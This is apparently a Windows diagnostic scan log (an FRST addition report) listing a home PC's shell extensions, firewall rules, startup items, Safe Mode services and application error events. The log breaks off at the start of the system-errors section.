ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} =>  -> No File
ContextMenuHandlers5: [igfxDTCM] -> {9B5F5829-A529-4B12-814A-E81BCB8D93FC} => C:\WINDOWS\System32\DriverStore\FileRepository\igdlh64.inf_amd64_1a33d2f73651d989\igfxDTCM.dll [2018-05-07] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)
ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\WINDOWS\system32\nvshext.dll [2017-06-19] (NVIDIA Corporation -> NVIDIA Corporation)
ContextMenuHandlers6: [AccExt] -> {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2021-01-28] (Adobe Inc. -> )
ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2021-05-06] (Malwarebytes Corporation -> Malwarebytes)
ContextMenuHandlers6: [McCtxMenuFrmWrk] -> {CCA9EFD3-29ED-430A-BA6D-E6BBFF0A60C2} => C:\Program Files\McAfee\MSC\McCtxMenuFrmWrk.dll [2021-03-31] (McAfee, LLC -> McAfee, LLC)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2021-04-07] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2021-04-07] (win.rar GmbH -> Alexander Roshal)

==================== Codecs (Whitelisted) ====================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Drivers32: [vidc.VP60] => C:\WINDOWS\SysWOW64\vp6vfw.dll [447752 2019-03-23] (Electronic Arts -> On2.com)
HKLM\...\Drivers32: [vidc.VP61] => C:\WINDOWS\SysWOW64\vp6vfw.dll [447752 2019-03-23] (Electronic Arts -> On2.com)

==================== Shortcuts & WMI ========================

(The entries could be listed to be restored or removed.)

ShortcutWithArgument: C:\Users\FRANCIS\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Excel.lnk -> C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe (Microsoft Corporation) ->  --profile-directory=Default --app-id=leffmjdabcgaflkikcefahmlgpodjkdm --app-url=hxxps://excel.office.com/
ShortcutWithArgument: C:\Users\FRANCIS\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Outlook.lnk -> C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe (Microsoft Corporation) ->  --profile-directory=Default --app-id=bjhmmnoficofgoiacjaajpkfndojknpb --app-url=hxxps://outlook.com/
ShortcutWithArgument: C:\Users\FRANCIS\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Word.lnk -> C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe (Microsoft Corporation) ->  --profile-directory=Default --app-id=hikhggiobiflkdfdgdajcfklmcibbopi --app-url=hxxps://word.office.com/
ShortcutWithArgument: C:\Users\FRANCIS\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Anaconda3 (64-bit)\Anaconda Prompt (anaconda3).lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation) -> "/K" C:\Users\FRANCIS\anaconda3\Scripts\activate.bat C:\Users\FRANCIS\anaconda3

==================== Loaded Modules (Whitelisted) =============

2021-03-08 12:25 - 2021-03-08 12:25 - 000365056 _____ () [File not signed] C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\Interop.CxHef9fb4ae#\92d73c1b4f373c56f37354527cf8180a\Interop.CxHDAudioAPILib.ni.dll
2021-03-08 12:25 - 2021-03-08 12:25 - 000018944 _____ () [File not signed] C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\Interop.CxUtilSvcLib\b532a24672ce5738c417f60f93ec4be1\Interop.CxUtilSvcLib.ni.dll
2020-10-01 12:14 - 2010-12-08 15:21 - 000753664 _____ (BCGSoft Co Ltd) [File not signed] C:\Program Files (x86)\USB Disk Security\BCGPStyle2010Blue150.dll
2020-10-01 12:14 - 2015-01-31 10:08 - 006062080 _____ (BCGSoft Ltd) [File not signed] C:\Program Files (x86)\USB Disk Security\BCGCBPRO1500u80.dll
2020-09-28 20:17 - 2016-07-14 09:58 - 001155072 _____ (Conexant Systems, Inc.) [File not signed] [File is in use] C:\Program Files\Conexant\SAII\CxHDAudioAPI.dll
2020-10-01 12:14 - 2015-01-31 10:08 - 001093120 _____ (Microsoft Corporation) [File not signed] C:\Program Files (x86)\USB Disk Security\MFC80U.DLL
2020-10-01 16:40 - 2020-10-01 16:40 - 000057344 _____ (Microsoft Corporation) [File not signed] C:\WINDOWS\WinSxS\x86_microsoft.vc80.mfcloc_1fc8b3b9a1e18e3b_8.0.50727.762_none_43efccf17831d131\MFC80ENU.DLL
2021-04-08 15:10 - 2021-04-08 15:10 - 000000000 ____L (Microsoft Corporation) C:\Program Files\Microsoft Office\root\Office16\AppVIsvSubsystems64.dll
2021-04-08 15:10 - 2021-04-08 15:10 - 000000000 ____L (Microsoft Corporation) C:\Program Files\Microsoft Office\root\Office16\c2r64.dll
2020-12-22 09:08 - 2020-05-30 14:58 - 001280000 _____ (Robert Simpson, et al.) [File not signed] C:\ProgramData\Lenovo\iMController\Plugins\GenericMessagingPlugin\x86\x86\SQLite.Interop.dll

==================== Alternate Data Streams (Whitelisted) ========

(If an entry is included in the fixlist, only the ADS will be removed.)

AlternateDataStreams: C:\ProgramData\TEMP:7C9E34A2 [260]

==================== Safe Mode (Whitelisted) ==================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\ModuleCoreService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcapexe => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McMPFSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcpltsvc => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeaack => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeaack.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeavfk => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeavfk.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefire => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfemms => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeplk => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeplk.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfetdi2k => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfetdi2k.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfevtp => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ModuleCoreService => ""="Service"

==================== Association (Whitelisted) =================

==================== Internet Explorer (Whitelisted) ==========

HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKU\S-1-5-21-3936790745-3440936247-791344644-1001\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKU\S-1-5-21-3936790745-3440936247-791344644-1001\Software\Microsoft\Internet Explorer\Main,Secondary Start Pages = hxxp://mystart.lenovo.com
HKU\S-1-5-21-3936790745-3440936247-791344644-1002\Software\Microsoft\Internet Explorer\Main,Secondary Start Pages = hxxp://mystart.lenovo.com
SearchScopes: HKU\S-1-5-21-3936790745-3440936247-791344644-1001 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKU\S-1-5-21-3936790745-3440936247-791344644-1002 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\root\Office16\OCHelper.dll [2021-04-08] (Microsoft Corporation -> Microsoft Corporation)
BHO: McAfee WebAdvisor -> {B164E929-A1B6-4A06-B104-2CD0E90A88FF} -> C:\Program Files\McAfee\WebAdvisor\x64\IEPlugin.dll [2021-04-30] (McAfee, LLC -> McAfee, LLC)
BHO-x32: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\OCHelper.dll [2021-04-08] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: McAfee WebAdvisor -> {B164E929-A1B6-4A06-B104-2CD0E90A88FF} -> C:\Program Files\McAfee\WebAdvisor\win32\IEPlugin.dll [2021-04-30] (McAfee, LLC -> McAfee, LLC)
DPF: HKLM-x32 {149E45D8-163E-4189-86FC-45022AB2B6C9} file:///C:/Program%20Files%20(x86)/CLUE%20Classic/Images/stg_drm.ocx
DPF: HKLM-x32 {6A060448-60F9-11D5-A6CD-0002B31F7455} 
DPF: HKLM-x32 {CC450D71-CC90-424C-8638-1F2DBAC87A54} file:///C:/Program%20Files%20(x86)/CLUE%20Classic/Images/armhelper.ocx
Handler: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2021-05-02] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2021-05-02] (Microsoft Corporation -> Microsoft Corporation)
Handler: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2021-05-02] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2021-05-02] (Microsoft Corporation -> Microsoft Corporation)
Handler: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2021-05-02] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2021-05-02] (Microsoft Corporation -> Microsoft Corporation)
Handler: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2021-05-02] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2021-05-02] (Microsoft Corporation -> Microsoft Corporation)
Filter: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - C:\Program Files\McAfee\MSC\McSnIePl64.dll [2021-03-31] (McAfee, LLC -> McAfee, LLC)
Filter-x32: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - C:\Program Files (x86)\McAfee\MSC\McSnIePl.dll [2021-03-31] (McAfee, LLC -> McAfee, LLC)

(If an entry is included in the fixlist, it will be removed from the registry.)

IE trusted site: HKU\S-1-5-21-3936790745-3440936247-791344644-1001\...\sharepoint.com -> hxxps://mymailmapuaedu-files.sharepoint.com

==================== Other Areas ===========================

(Currently there is no automatic fix for this section.)

HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path -> C:\Python39\Scripts\;C:\Python39\;C:\Program Files (x86)\Common Files\Intel\Shared Libraries\redist\intel64\compiler;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\WINDOWS\System32\OpenSSH\;C:\Program Files\NVIDIA Corporation\NVIDIA NvDLISR;C:\Program Files\MATLAB\R2019b\bin;C:\ProgramData\chocolatey\bin;C:\Program Files (x86)\FontForgeBuilds\bin;C:\Program Files\nodejs\
HKCU\Environment\\Path -> ;C:\Users\FRANCIS\AppData\Local\Programs\Microsoft VS Code\bin;C:\Users\FRANCIS\AppData\Roaming\npm
HKU\S-1-5-21-3936790745-3440936247-791344644-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\FRANCIS\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper
HKU\S-1-5-21-3936790745-3440936247-791344644-1002\Control Panel\Desktop\\Wallpaper -> C:\WINDOWS\web\wallpaper\Windows\img0.jpg
DNS Servers: 192.168.15.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: Warn)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

(If an entry is included in the fixlist, it will be removed.)

HKLM\...\StartupApproved\Run: => "AdobeGCInvoker-1.0"
HKLM\...\StartupApproved\Run: => "AdobeAAMUpdater-1.0"
HKLM\...\StartupApproved\Run32: => "TeamsMachineInstaller"
HKU\S-1-5-21-3936790745-3440936247-791344644-1001\...\StartupApproved\StartupFolder: => "GenuineService.lnk"
HKU\S-1-5-21-3936790745-3440936247-791344644-1001\...\StartupApproved\StartupFolder: => "Send to OneNote.lnk"
HKU\S-1-5-21-3936790745-3440936247-791344644-1001\...\StartupApproved\Run: => "com.squirrel.Teams.Teams"
HKU\S-1-5-21-3936790745-3440936247-791344644-1001\...\StartupApproved\Run: => "BitTorrent"
HKU\S-1-5-21-3936790745-3440936247-791344644-1001\...\StartupApproved\Run: => "Lync"
HKU\S-1-5-21-3936790745-3440936247-791344644-1002\...\StartupApproved\Run: => "com.squirrel.Teams.Teams"

==================== FirewallRules (Whitelisted) ================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [UDP Query User{33CC5D8F-A04C-4287-98A2-248BF85E83CA}C:\windows.old\users\francis\appdata\roaming\bittorrent\bittorrent.exe] => (Allow) C:\windows.old\users\francis\appdata\roaming\bittorrent\bittorrent.exe => No File
FirewallRules: [TCP Query User{2FDCF539-A9A5-418E-915D-A9F6DE9DB683}C:\windows.old\users\francis\appdata\roaming\bittorrent\bittorrent.exe] => (Allow) C:\windows.old\users\francis\appdata\roaming\bittorrent\bittorrent.exe => No File
FirewallRules: [UDP Query User{E9A63349-3DAD-43E9-A0C2-4B2F8C93E608}C:\windows.old\users\francis\appdata\roaming\bittorrent\bittorrent.exe] => (Block) C:\windows.old\users\francis\appdata\roaming\bittorrent\bittorrent.exe => No File
FirewallRules: [TCP Query User{B5DCAAF9-24E1-46F6-99C1-35F496281A4A}C:\windows.old\users\francis\appdata\roaming\bittorrent\bittorrent.exe] => (Block) C:\windows.old\users\francis\appdata\roaming\bittorrent\bittorrent.exe => No File
FirewallRules: [{07BBFCF6-DF65-47F5-85C2-7D1B7C24B1A3}] => (Allow) C:\Users\FRANCIS\AppData\Roaming\BitTorrent\BitTorrent.exe (BitTorrent Inc -> BitTorrent Inc.)
FirewallRules: [{2888FD9A-0240-4993-8574-4D6FE92763C9}] => (Allow) C:\Users\FRANCIS\AppData\Roaming\BitTorrent\BitTorrent.exe (BitTorrent Inc -> BitTorrent Inc.)
FirewallRules: [{0456832C-81E2-4CB4-A595-ADAA5BE13C5A}] => (Allow) C:\Users\FRANCIS\AppData\Roaming\BitTorrent\BitTorrent.exe (BitTorrent Inc -> BitTorrent Inc.)
FirewallRules: [{C756A12D-A4ED-4DE2-BABB-B63C963899F5}] => (Allow) C:\Users\FRANCIS\AppData\Roaming\BitTorrent\BitTorrent.exe (BitTorrent Inc -> BitTorrent Inc.)
FirewallRules: [{55C341D3-D845-4467-B7D4-A1A3C9365514}] => (Allow) C:\Users\FRANCIS\AppData\Roaming\BitTorrent\BitTorrent.exe (BitTorrent Inc -> BitTorrent Inc.)
FirewallRules: [{92E821F5-0067-4BE8-87DC-FF54D1DDAF46}] => (Allow) C:\Users\FRANCIS\AppData\Roaming\BitTorrent\BitTorrent.exe (BitTorrent Inc -> BitTorrent Inc.)
FirewallRules: [{AA11FF77-EA4F-41ED-8B5D-3EE615A05069}] => (Allow) C:\Users\FRANCIS\AppData\Roaming\Zoom\bin\Zoom.exe (Zoom Video Communications, Inc. -> Zoom Video Communications, Inc.)
FirewallRules: [{E5F8868D-3083-4DA4-9765-2120F6BF9795}] => (Allow) C:\Users\FRANCIS\AppData\Roaming\Zoom\bin\airhost.exe (Zoom Video Communications, Inc. -> Zoom Video Communications, Inc.)
FirewallRules: [{0BA8BD44-83D9-40E6-A999-E4D37858CBB0}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\Lync.exe => No File
FirewallRules: [{717921BB-9091-4EED-A4CD-7505A7ED940F}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe => No File
FirewallRules: [TCP Query User{C2385DA0-E699-4532-9801-1101007A4A24}C:\program files\the sims 4\game\bin\ts4_x64.exe] => (Allow) C:\program files\the sims 4\game\bin\ts4_x64.exe (Electronic Arts Inc.) [File not signed]
FirewallRules: [UDP Query User{9BE27131-2F41-4793-B132-6CA531C80BFA}C:\program files\the sims 4\game\bin\ts4_x64.exe] => (Allow) C:\program files\the sims 4\game\bin\ts4_x64.exe (Electronic Arts Inc.) [File not signed]
FirewallRules: [TCP Query User{7E8B4214-F799-4C32-B0FA-0C501D6B769F}C:\users\francis\appdata\local\microsoft\teams\current\teams.exe] => (Allow) C:\users\francis\appdata\local\microsoft\teams\current\teams.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [UDP Query User{620EE8CA-B37A-4A2B-960E-839973E37DCA}C:\users\francis\appdata\local\microsoft\teams\current\teams.exe] => (Allow) C:\users\francis\appdata\local\microsoft\teams\current\teams.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{1B5FFB87-BD24-4AAB-8232-877F7C32E185}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (NVIDIA Corporation -> NVIDIA Corporation)
FirewallRules: [{6EB62FA3-39D4-4B05-A11B-582C247C8AFE}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (NVIDIA Corporation -> NVIDIA Corporation)
FirewallRules: [{D46C3A74-A2FD-4549-8A91-5A292FD373D7}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.68.96.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{1A279772-FE45-4B7F-98BC-83D4DC4D3B1F}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.68.96.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{65533106-6D9B-4ED1-A603-23424A01100A}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.68.96.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{2E7F0967-8379-4D15-A8F7-A0C70358B61D}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.68.96.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [TCP Query User{62309B5E-7E93-452D-85D7-5ECA8B8D2138}C:\users\francis\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\francis\appdata\roaming\spotify\spotify.exe (Spotify AB -> Spotify Ltd)
FirewallRules: [UDP Query User{C53D51E0-69B0-447A-9628-66CDE2C11DD7}C:\users\francis\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\francis\appdata\roaming\spotify\spotify.exe (Spotify AB -> Spotify Ltd)
FirewallRules: [TCP Query User{1DC8F033-ACD2-43D0-810E-40C8034169CB}C:\users\francis\appdata\roaming\spotify\spotify.exe] => (Block) C:\users\francis\appdata\roaming\spotify\spotify.exe (Spotify AB -> Spotify Ltd)
FirewallRules: [UDP Query User{0E7FB93C-3FCF-492C-8942-5F9902E6AF3D}C:\users\francis\appdata\roaming\spotify\spotify.exe] => (Block) C:\users\francis\appdata\roaming\spotify\spotify.exe (Spotify AB -> Spotify Ltd)
FirewallRules: [{49F5DBB5-AFEA-4EA5-925F-7B913B073C46}] => (Allow) C:\Program Files\The Sims 2 Ultimate Collection\Fun with Pets\SP9\TSBin\Sims2EP9.exe (Maxis, a division of Electronic Arts Inc.) [File not signed]
FirewallRules: [{A7C37344-5433-47B3-9391-0549424B09C3}] => (Allow) C:\Program Files\The Sims 2 Ultimate Collection\Fun with Pets\SP9\TSBin\Sims2EP9.exe (Maxis, a division of Electronic Arts Inc.) [File not signed]
FirewallRules: [{F97B6736-0B66-4DD1-9300-900E438ADC1D}] => (Allow) C:\Program Files (x86)\Lenovo\System Update\uncserver.exe (Lenovo -> )
FirewallRules: [{1595DAE1-94A1-4BEE-8C9A-8A2A87AD69FA}] => (Allow) C:\Program Files (x86)\Lenovo\System Update\uncserver.exe (Lenovo -> )
FirewallRules: [{B1443A2D-C10F-4D7B-B0E5-D23CE1F9FCD3}] => (Block) C:\Program Files\EaseUS\EaseUS Data Recovery Wizard\DRW.exe => No File
FirewallRules: [{CE7DA8F3-C864-4218-8034-F5E810694A18}] => (Block) C:\Program Files\EaseUS\EaseUS Data Recovery Wizard\DRWUI.exe => No File
FirewallRules: [{E525347A-A948-4513-9338-37E34903389E}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\Lync.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{53DA5FCB-03B1-47B3-8F3F-1C013CF5B3FB}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\Lync.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{CD74709F-9987-4A09-A025-6E452B134692}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\UcMapi.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{72085FAE-6A37-4774-ABCF-028B74723DC4}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (NVIDIA Corporation -> NVIDIA Corporation)
FirewallRules: [{B1A406EC-89D8-405E-8973-45A8BD00BCC0}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (NVIDIA Corporation -> NVIDIA Corporation)
FirewallRules: [{A96D2325-0844-4943-9D87-D23DAC9F6AC7}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe (NVIDIA Corporation -> NVIDIA Corporation)
FirewallRules: [{4171C853-6EDB-4B71-B2DF-FFF66E8374C3}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe (NVIDIA Corporation -> NVIDIA Corporation)
FirewallRules: [{88742A13-B4E2-4613-8E55-3C211095B389}] => (Allow) C:\Program Files (x86)\Common Files\Mcafee\MMSSHost\MMSSHost.exe (McAfee, LLC -> McAfee, LLC)
FirewallRules: [{91FB82E9-2BB5-4174-92D6-2C4CE2C0DE26}] => (Allow) C:\Program Files\Common Files\McAfee\MMSSHost\MMSSHost.exe (McAfee, LLC -> McAfee, LLC)
FirewallRules: [{09A668FD-A7A6-4801-AB23-266C7E561E6F}] => (Allow) C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe (McAfee, LLC -> McAfee, LLC)
FirewallRules: [{9A9D7F93-D218-463D-9E4C-9702C0D2FE41}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\outlook.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{CDB1353C-D9B2-4804-9C27-DC3587BFF5CE}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\UcMapi.exe (Microsoft Corporation -> Microsoft Corporation)

==================== Restore Points =========================

05-05-2021 11:36:48 Scheduled Checkpoint
06-05-2021 09:53:15 Windows Modules Installer
06-05-2021 10:20:21 Windows Modules Installer
07-05-2021 09:21:27 Removed Adobe Acrobat DC.

==================== Faulty Device Manager Devices ============

==================== Event log errors: ========================

Application errors:
==================
Error: (05/07/2021 09:27:34 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: ADelRCP.exe, version: 21.1.20150.39313, time stamp: 0x607f6ae1
Faulting module name: ucrtbase.dll, version: 10.0.19041.789, time stamp: 0x82dc99a2
Exception code: 0xc0000409
Fault offset: 0x0009d132
Faulting process id: 0x23a0
Faulting application start time: 0x01d742e025baf1c1
Faulting application path: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe
Faulting module path: C:\WINDOWS\System32\ucrtbase.dll
Report Id: 12b05567-9e1c-495a-8014-344c92c4e202
Faulting package full name: 
Faulting package-relative application ID: 

Error: (05/06/2021 02:59:50 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program Microsoft.Photos.exe version 2020.20120.4004.0 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Security and Maintenance control panel.
Process ID: 1784
Start Time: 01d7424531db65b3
Termination Time: 4294967295
Application Path: C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2020.20120.4004.0_x64__8wekyb3d8bbwe\Microsoft.Photos.exe
Report Id: 6fa2ff16-ef10-4395-8bcc-aab6ec1bd2fb
Faulting package full name: Microsoft.Windows.Photos_2020.20120.4004.0_x64__8wekyb3d8bbwe
Faulting package-relative application ID: App
Hang type: Activation

Error: (05/04/2021 08:47:57 PM) (Source: VSS) (EventID: 8193) (User: )
Description: Volume Shadow Copy Service error: Unexpected error calling routine QueryFullProcessImageNameW.  hr = 0x80070006, The handle is invalid. .
Operation:    Executing Asynchronous Operation
Context:    Current State: DoSnapshotSet

Error: (05/04/2021 06:10:10 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program Launch.exe version 18.11.154.0 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Security and Maintenance control panel.
Process ID: 1194
Start Time: 01d740ccf4ff8045
Termination Time: 4294967295
Application Path: C:\Program Files\McAfee\CoreUI\Launch.exe
Report Id: 35ebc678-069c-40ac-b971-731f75b6a443
Faulting package full name: 
Faulting package-relative application ID: 
Hang type: Top level window is idle

Error: (05/04/2021 03:15:28 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program LockApp.exe version 10.0.19041.844 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Security and Maintenance control panel.
Process ID: 3194   Start Time: 01d740b4590f7113   Termination Time: 4294967295   Application Path: C:\Windows\SystemApps\Microsoft.LockApp_cw5n1h2txyewy\LockApp.exe   Report Id: 4be4fb5e-765c-4158-bed0-36c963af4ca4   Faulting package full name: Microsoft.LockApp_10.0.19041.423_neutral__cw5n1h2txyewy   Faulting package-relative application ID: WindowsDefaultLockScreen   Hang type: Quiesce   Error: (05/03/2021 08:58:44 PM) (Source: VSS) (EventID: 8193) (User: ) Description: Volume Shadow Copy Service error: Unexpected error calling routine RegSetValueExW(0x000003fc,SYSTEM\CurrentControlSet\Services\VSS\Diag\VssvcPublisher,0,REG_BINARY,000000A037CFED20.72).  hr = 0x80070005, Access is denied. .   Error: (05/03/2021 08:58:44 PM) (Source: VSS) (EventID: 8193) (User: ) Description: Volume Shadow Copy Service error: Unexpected error calling routine RegSetValueExW(0x00000288,SYSTEM\CurrentControlSet\Services\VSS\Diag\COM+ REGDB Writer,0,REG_BINARY,000000A0380FF280.72).  hr = 0x80070005, Access is denied. .     Operation:    BackupShutdown Event   Context:    Execution Context: Writer    Writer Class Id: {542da469-d3e1-473c-9f4f-7847f01fc64f}    Writer Name: COM+ REGDB Writer    Writer Instance ID: {e7e2a211-c1b2-447a-86e8-0f1a13d9d43d}   Error: (05/03/2021 08:58:44 PM) (Source: VSS) (EventID: 8193) (User: ) Description: Volume Shadow Copy Service error: Unexpected error calling routine RegSetValueExW(0x00000280,(null),0,REG_BINARY,0000002CF238D800.72).  hr = 0x80070005, Access is denied. .     Operation:    BackupShutdown Event   Context:    Execution Context: Writer    Writer Class Id: {a6ad56c2-b509-4e6c-bb19-49d8f43532f0}    Writer Name: WMI Writer    Writer Instance ID: {8d07eb09-1827-4d85-ab69-35736fff7086}     System errors: ============= Error: 